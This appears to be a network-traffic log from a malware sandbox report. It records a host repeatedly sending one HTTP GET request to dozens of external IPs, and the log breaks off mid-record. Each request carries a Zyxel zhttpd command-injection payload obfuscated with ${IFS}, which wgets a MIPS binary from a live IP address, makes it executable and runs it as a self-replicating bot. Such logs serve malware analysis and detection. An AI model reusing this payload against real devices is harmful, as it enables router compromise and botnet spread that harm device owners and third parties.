                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  54192.168.2.135556627.110.229.17443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.519248962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  55192.168.2.133579436.75.151.124443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.519345045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  56192.168.2.1357224185.45.36.40443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.519407988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  57192.168.2.1353088118.53.24.14443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.519408941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  58192.168.2.134593287.89.127.117443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.519503117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  59192.168.2.1346366181.79.121.93443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.519557953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  60192.168.2.1336740108.210.169.207443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.519634008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  61192.168.2.1346150131.217.238.105443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.519676924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  62192.168.2.1335524146.168.160.45443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.520056963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  63192.168.2.134994223.220.173.244443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.520087957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  64192.168.2.135957250.188.24.226443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.520119905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  65192.168.2.134484813.129.224.35443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.520188093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  66192.168.2.135376295.218.114.20443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.520289898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  67192.168.2.1340572183.12.100.190443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.520345926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  68192.168.2.1353260174.213.205.62443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.520406961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  69192.168.2.1347228140.232.40.97443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.520486116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  70192.168.2.133708698.85.119.211443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.520526886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  71192.168.2.13389089.11.184.155443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.520597935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  72192.168.2.1336668210.21.243.73443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.520653009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  73192.168.2.133414613.143.10.20443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.520670891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  74192.168.2.136082246.130.83.32443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.520786047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  75192.168.2.1345298139.184.144.41443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.520834923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  76192.168.2.134386891.123.229.246443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.520925045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  77192.168.2.1335352193.190.13.131443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.520992994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  78192.168.2.1352736222.235.188.169443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.521007061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  79192.168.2.1353038131.34.104.74443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.521097898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  80192.168.2.134611244.1.75.178443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.521140099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  81192.168.2.1358008219.184.254.181443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.521250963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  82192.168.2.1343686184.250.25.42443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.521281004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  83192.168.2.1335526189.212.73.155443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.521411896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  84192.168.2.1345144121.63.185.11443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.521434069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  85192.168.2.1358136177.67.127.219443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.521487951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  86192.168.2.1342660160.112.203.86443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.521538019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  87192.168.2.1345308168.29.134.64443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.521693945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  88192.168.2.1345348153.215.206.250443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.521714926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  89192.168.2.134527432.33.38.168443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.521884918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  90192.168.2.1351898138.36.148.18443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.522001028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  91192.168.2.135933619.190.22.50443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.522049904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  92192.168.2.1356590142.76.160.180443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.522084951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  93192.168.2.1360380139.243.141.84443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.522161961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  94192.168.2.1341556185.133.150.109443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.522213936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  95192.168.2.1337776153.122.191.187443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.522277117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  96192.168.2.134438265.43.87.252443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.522330046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  97192.168.2.134159841.155.251.27443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.522401094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  98192.168.2.1333094199.153.207.241443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.522428989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  99192.168.2.1335612163.212.116.178443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.522486925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  100192.168.2.1349814208.86.113.238443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.522532940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  101192.168.2.1353454187.102.95.74443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.522559881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  102192.168.2.134227424.59.249.237443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.522659063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  103192.168.2.1336928217.34.97.239443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.522737026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  104192.168.2.13377464.68.80.161443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.522816896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  105192.168.2.1357560173.72.152.122443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.522921085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  106192.168.2.133505443.6.154.225443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.523384094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  107192.168.2.1342208168.149.239.31443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.523422956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  108192.168.2.1345608193.18.192.130443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.523475885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  109192.168.2.1348930125.82.49.240443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.523613930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  110192.168.2.135971438.252.123.60443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.523629904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  111192.168.2.1355366177.28.119.54443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.523653984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  112192.168.2.1342378109.183.185.86443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.523730040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  113192.168.2.133453687.1.192.186443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.523804903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  114192.168.2.135447870.150.16.254443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.523858070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  115192.168.2.135400852.247.40.171443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.523900986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  116192.168.2.1337530197.108.91.236443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.524080038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  117192.168.2.1356036149.199.251.94443
                                                  TimestampBytes transferredDirectionData
